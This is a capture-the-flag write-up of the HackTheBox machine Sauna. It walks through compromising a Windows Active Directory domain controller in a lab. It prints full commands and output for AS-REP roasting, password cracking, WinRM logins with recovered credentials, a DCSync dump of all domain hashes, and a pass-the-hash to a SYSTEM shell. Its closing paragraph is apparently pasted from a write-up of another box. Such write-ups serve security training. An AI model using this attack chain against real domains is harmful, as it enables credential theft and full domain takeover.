HTB: Sauna

Sauna card

This is a writeup about a retired HacktheBox machine: Sauna published on February the 15th 2020 by egotisticalSW This box is classified as an easy machine. This box has a lot of similarities with forest: The user part require some smart enumeration. The second user also require to enumerate the box and the root part is a "simple" exploitation of the second user's privileges.

User

Recon

We start with an nmap scan. As always with the Windows boxes, a lot of services are exposed by the box.

# Nmap 7.80 scan initiated Mon Feb 17 08:29:26 2020 as: nmap -p- -sS -oN nmap_ss 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.27s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49681/tcp open  unknown
57381/tcp open  unknown

# Nmap done at Mon Feb 17 08:43:53 2020 -- 1 IP address (1 host up) scanned in 867.44 seconds

We run a version scan on the open ports. There is a IIS web server on port 80:

# Nmap 7.80 scan initiated Mon Feb 17 08:45:29 2020 as: nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49671,49681,57381 -sSV -oN nmap_ssv 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.31s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-17 21:45:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
57381/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/17%Time=5E4A9906%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 17 08:48:06 2020 -- 1 IP address (1 host up) scanned in 156.46 seconds

Web

The website is about the Egotistical Bank.

Sauna website

The only "interesting" page is the "about" page where we can get a list of the "amazing" team.

Sauna the "amazing" team

We get the teams members and put them in a file. We try to guess the name convention use by the company. For instance, for the employee John Doe we try "john.doe", "jdoe", "jodoe". This give use a list of possible users as the following:

fergus.smith
hugo.bear
steven.kerb
shaun.coins
bowie.taylor
sophie.driver
fsmith
hbear
skerb
scoins
btaylor
sdriver
fesmith
hubear
stkerb
shcoins
botaylor
sodriver

We launch impacket's script GetNPUsers.py against our users list. We get the krb5tgs/Kerberoasting hash of the fsmith user.

python GetNPUsers.py  -dc-ip 10.10.10.175  egotisticalbank/ -usersfile ~/pentest/htb_sauna/users
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICALBANK:7737b8e55d1ac7976a01e619a1268567$268f28ec59cfeda91a139f8f8c2c5cb9679d0dc04ba133f031b3021ebbd203888cd12633a0e604ad28420ff3fe41694d38f55b434bbe2af2b7ee0958a9a5705e4a880e2ecebb74a4d1aca73371cfcb73fb54a61520392d76079cc32bf3e128b87e3450d68361a84b4c686104e2fe13dc3cd7bd381a5ac87737ab8b95908bf0be409c7642fcfac3599aca04d19fd0f25f7bb4908a6fb496975f68ee3a4761ca406a43502b86410774127f25a5dc14c76dde7ac458df451dbcb093c4c6d069406e98c4839ecd6a0952a0850c289fab93e29682ec64cb690add83d0c6986c8f078bf25e53662f7d7fcc2c1e4740554036218a71320da2067a1298
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

We crack that hash using John and the Rockyou dictionary getting fsmith password.

john hash -w=tools/password_lists/rockyou.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICALBANK)
1g 0:00:00:19 DONE (2020-02-17 15:33) 0.05235g/s 551780p/s 551780c/s 551780C/s Thines..Thehulk2008
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We connect on the box with our fsmith account using evil-winrm. And get the user flag on his desktop.

ruby evil-winrm.rb -u fsmith -i 10.10.10.175 -p 'Thestrokes23'

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> cat ../Desktop/user.txt
1b5520b98d97cf17f24122a55baf70cf

Getting root

Getting svc_loanmgr

We take a look at the other users on the box using net user.

*Evil-WinRM* PS C:\Users\FSmith\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

We upload winPEAS.exe from the Privilege Escalation Awesome Scripts SUITE and run it on the box.

It found some AutoLogon credetials for the account svc_loanmgr.

[+] Looking for AutoLogon credentials(T1012)
  Some AutoLogon credentials were found!!
      DefaultDomainName             :  EGOTISTICALBANK
      DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
      DefaultPassword               :  Moneymakestheworldgoround!

We connect on the box with the svc_loanmgr account using evil-winrm.

ruby evil-winrm.rb -u svc_loanmgr -i 10.10.10.175 -p 'Moneymakestheworldgoround!'

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

Enumerating our user's privileges

We run the whoami /all command to list our user permissions but there is nothing interesting here: As the Microsoft documentation point out all our privileges and group are legitimate.

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /all

USER INFORMATION
----------------

User Name                   SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108


GROUP INFORMATION
-----------------

mGroup Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
nNT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> WHOAMI /PRIV

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Getting AD privileges

We need to list our AD privileges. We upload ADRecon powershell script on the box, run it and download the results.

(for more information about AD attacks: payloadallthethings.)

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /root/pentest/ADRecon.ps1 .\
Info: Uploading /root/pentest/ADRecon.ps1 to .\

Data: 835464 bytes of 835464 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> .\ADRecon.ps1
[*] ADRecon v1.1 by Prashant Mahajan (@prashant3535)
Access denied
At C:\Users\svc_loanmgr\Documents\ADRecon.ps1:11249 char:25
+ ...           $computer = Get-CimInstance -ClassName Win32_ComputerSystem
+                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (root\cimv2:Win32_ComputerSystem:String) [Get-CimInstance], CimException
    + FullyQualifiedErrorId : HRESULT 0x80041003,Microsoft.Management.Infrastructure.CimCmdlets.GetCimInstanceCommand
Computer Role could not be identified.
Cannot find a variable with the name 'computerrole'.
At C:\Users\svc_loanmgr\Documents\ADRecon.ps1:11292 char:5
+     Remove-Variable computerrole
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (computerrole:String) [Remove-Variable], ItemNotFoundException
    + FullyQualifiedErrorId : VariableNotFound,Microsoft.PowerShell.Commands.RemoveVariableCommand
[*] Running on \SAUNA -
[*] Commencing - 02/19/2020 15:41:03
[-] Domain
[-] Forest
[-] Trusts
[-] Sites
[-] Subnets
[-] Default Password Policy
[-] Fine Grained Password Policy - May need a Privileged Account
[-] Domain Controllers
[-] Users - May take some time
[-] User SPNs
[-] PasswordAttributes - Experimental
[-] Groups - May take some time
[-] Group Memberships - May take some time
[-] OrganizationalUnits (OUs)
[-] GPOs
[-] gPLinks - Scope of Management (SOM)
[-] DNS Zones and Records
[-] Printers
[-] Computers - May take some time
[-] Computer SPNs
[-] LAPS - Needs Privileged Account
Warning: [*] LAPS is not implemented.
[-] BitLocker Recovery Keys - Needs Privileged Account
[-] ACLs - May take some time
Warning: [*] SACLs - Currently, the module is only supported with LDAP.
[-] GPOReport - May take some time
[*] Total Execution Time (mins): 0.69
[*] Output Directory: C:\Users\svc_loanmgr\Documents\ADRecon-Report-20200219154103
Warning: [Get-ADRExcelComObj] Excel does not appear to be installed. Skipping generation of ADRecon-Report.xlsx. Use the -GenExcel parameter to generate the ADRecon-Report.xslx on a host with Microsoft Excel installed.
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download ADRecon-Report-20200219154103 /tmp/adrecon
Info: Downloading ADRecon-Report-20200219154103 to /tmp/adrecon

Info: Download successful!

We look at our user permissions and found that it has the AD privilege DS-Replication-Get-Changes which allows to replicate changes from a given NC.

grep svc CSV-Files/*
CSV-Files/AboutADRecon.csv:"Ran as user","svc_loanmgr"
CSV-Files/DACLs.csv:"EGOTISTICAL-BANK","Domain","All","All","ReadProperty, GenericExecute","Allow","EGOTISTICALBANK\svc_loanmgr","Administrators","False","None","None","None","None","00000000-0000-0000-0000-000000000000","00000000-0000-0000-0000-000000000000","EGOTISTICALBANK\svc_loanmgr","S-1-5-32-544","DC=EGOTISTICAL-BANK,DC=LOCAL"
CSV-Files/DACLs.csv:"EGOTISTICAL-BANK","Domain","DS-Replication-Get-Changes","All","ExtendedRight","Allow","EGOTISTICALBANK\svc_loanmgr","Administrators","False","ObjectAceTypePresent","None","None","None","1131f6aa-9c07-11d1-f79f-00c04fc2dcd2","00000000-0000-0000-0000-000000000000","EGOTISTICALBANK\svc_loanmgr","S-1-5-32-544","DC=EGOTISTICAL-BANK,DC=LOCAL"
CSV-Files/DACLs.csv:"EGOTISTICAL-BANK","Domain","DS-Replication-Get-Changes-All","All","ExtendedRight","Allow","EGOTISTICALBANK\svc_loanmgr","Administrators","False","ObjectAceTypePresent","None","None","None","1131f6ad-9c07-11d1-f79f-00c04fc2dcd2","00000000-0000-0000-0000-000000000000","EGOTISTICALBANK\svc_loanmgr","S-1-5-32-544","DC=EGOTISTICAL-BANK,DC=LOCAL"
CSV-Files/GroupMembers.csv:"Domain Users","svc_loanmgr","L Manager","user"
CSV-Files/GroupMembers.csv:"Remote Management Users","svc_loanmgr","L Manager","user"
CSV-Files/Users.csv:"svc_loanmgr","L Manager","True","False","False","True","False","False","True","False",,,,"False","False","0","25","False","False","False","False","False",,,,,,"513","S-1-5-21-2966785786-3096785034-1186376766-1108","","","","","","","","2/19/2020 3:39:15 PM","1/24/2020 3:48:31 PM",,,"","",,,,"66048","L","","Manager","","1/24/2020 3:48:31 PM","2/19/2020 3:39:15 PM","CN=L Manager,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL","EGOTISTICAL-BANK.LOCAL/Users/

DCSync

This extended privilege allow us to run DCSync attack. For that we use impacket's secretdump.py to get the users' passwords hashes and mostly the administrator's password hash.

python secretsdump.py 'egotisticalbank.local/svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7a2965077fddedf348d938e4fa20ea1b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:a90968c91de5f77ac3b7d938bd760002373f71e14e1a027b2d93d1934d64754a
SAUNA$:aes128-cts-hmac-sha1-96:0bf0c486c1262ab6cf46b16dc3b1b198
SAUNA$:des-cbc-md5:b989ecc101ae4ca1
[*] Cleaning up...

PTH

We can then use the Path the hash technique with impacket's psexec.py to login as Administrator on the Domain Controller as administrator and get the flag.

python psexec.py egotisticalbank.local/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file NEOSMAXA.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service RFiq on 10.10.10.175.....
[*] Starting service RFiq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
f3ee04965c68257382e31502cc5e881f

Wrapping up

This box is a lot like Forest and I am a bit disappointed. Apart from that the box is interesting.

What a journey. This box was classified as easy but probably needed a medium classification. WinRM is so finicky. The root part was interesting as it allowed us to play with AD privileges which doesn't happen a lot outside of client environments.

(Conclustion of Forest)